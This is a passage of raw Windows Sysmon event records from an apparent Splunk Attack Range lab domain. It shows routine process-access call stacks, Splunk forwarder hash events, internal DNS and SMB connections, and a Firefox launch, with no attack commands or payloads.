07:58:21.261{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104913Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:22.527{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7900D0C43FFD6D9FFD20D2E779DD1415,SHA256=F8367F5406E7DD9974FDA4ABBF753205C07C99802EB01E258DCDC216BA930C2F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082779Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:22.839{2FDD8D40-AC99-615A-0B00-00000000FD01}6282132C:\Windows\system32\lsass.exe{2FDD8D40-AC7D-615A-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000082778Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:22.307{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F09D8943C909A3616EE7BC8819479BE0,SHA256=D9DB13FF53D081B3661FA155DCD91F9F458FEF12088847A1FB4A3551D2E3C534,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104916Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:23.824{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E8CAAF1CB78D4EB2704F8E1D2760B25,SHA256=E86E399B5B2C2A8A19ADCF7CD7A42F7152ADAE96DBE5228A26423818E0EB163F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104915Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:23.824{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CDA2E95D19F99490F87BF66F88AC6FA,SHA256=81D445ADBBFAC1D96AD8064050E3394431BB7B9ED1424450C61FE4B33DB24EE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104914Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:23.527{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F09E41AF1BFFE002094908A2ED3052,SHA256=2071FE0C5837DF3BF8C0D6E20269BE673EF9A0DDD58956F61004C1DA4F9A3244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082780Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:23.339{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52B731265BCD93ADF6F869F3E96C15A7,SHA256=E01A31CC88FA45AB1C83F2E3B445C38F4065024539743F546741B14CD79A61DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082784Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:22.783{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50120-false10.0.1.12-8000- 354300x800000000000000082783Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:22.398{2FDD8D40-AC7D-615A-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50119-false10.0.1.14-445microsoft-ds 354300x800000000000000082782Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:22.395{2FDD8D40-AC9A-615A-1400-00000000FD01}404C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:9800:fa77:8ee3:ffff-51945-truea00:10e:0:0:0:0:0:0-53domain 23542300x800000000000000082781Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:24.370{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E1DA0B1FEAD69CED8815AA4548A40C9,SHA256=1E658F5E6B60E6FB60B27F1E9A8B4D993DBB3F3C7A761E0A91A490CA21283CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104919Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:24.527{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85A4D1F50FCF13AC1B0B3335847FB401,SHA256=04588F99ACD914A1660CA69C7D42F556473948458ABCADBF774E7E8B318A27DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104918Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:23.065{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.15-51945- 354300x8000000000000000104917Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:22.359{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51736-false10.0.1.12-8000- 23542300x800000000000000082785Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:25.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=362E524CD6D2BABF42AF72CB14105597,SHA256=E4C0CFDDBF89340BD9881CA98285002E5E029F0D37876D13C115D9CE80346FB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104921Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:25.527{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91DAF12321014A9AB5AEC4572EE0F944,SHA256=2AFC78792C67DC517935E3B9FA7BA6F587A70EDB5436BA9BD2E8243236BEE447,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104920Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:23.068{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15-50119-false10.0.1.14win-dc-639.attackrange.local445microsoft-ds 23542300x800000000000000082786Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:26.714{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23EF7674246EAD96F3A6717AC8050012,SHA256=A717AA5C884E626373CDA02936184468FE659B3678A2DDAAD9C66CA338631D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104944Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.558{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C51DE3A1AAB3681186899FAE62DCDC2,SHA256=34A43C2D10CB0C5F9FB36AF26138A5B2CA8E59F04A66B0FAF76E57351E89A5E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104943Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.527{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104942Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.527{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104941Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.527{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104940Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.511{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B422-615A-0502-00000000FC01}5660C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+7396|C:\Program Files\Mozilla Firefox\firefox.exe+57b9|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104939Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104938Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104937Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104936Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104935Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104934Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-B422-615A-0502-00000000FC01}56605700C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+8ba5|C:\Program Files\Mozilla Firefox\firefox.exe+57b9|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104933Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.394{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92MediumMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0502-00000000FC01}5660C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000104932Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.387{58E9C193-B422-615A-0502-00000000FC01}56605700C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+7396|C:\Program Files\Mozilla Firefox\firefox.exe+57b9|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000104931Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localInvDBSetValue2021-10-04 07:58:26.308{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKU\S-1-5-21-2972807901-630771461-2089256853-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Mozilla Firefox\firefox.exeBinary Data 10341000x8000000000000000104930Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.308{58E9C193-ACA7-615A-1200-00000000FC01}7641144C:\Windows\System32\svchost.exe{58E9C193-B422-615A-0502-00000000FC01}5660C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104929Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.308{58E9C193-ACA7-615A-1200-00000000FC01}7641144C:\Windows\System32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104928Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.292{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B422-615A-0502-00000000FC01}5660C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104927Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.292{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104926Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.292{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104925Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 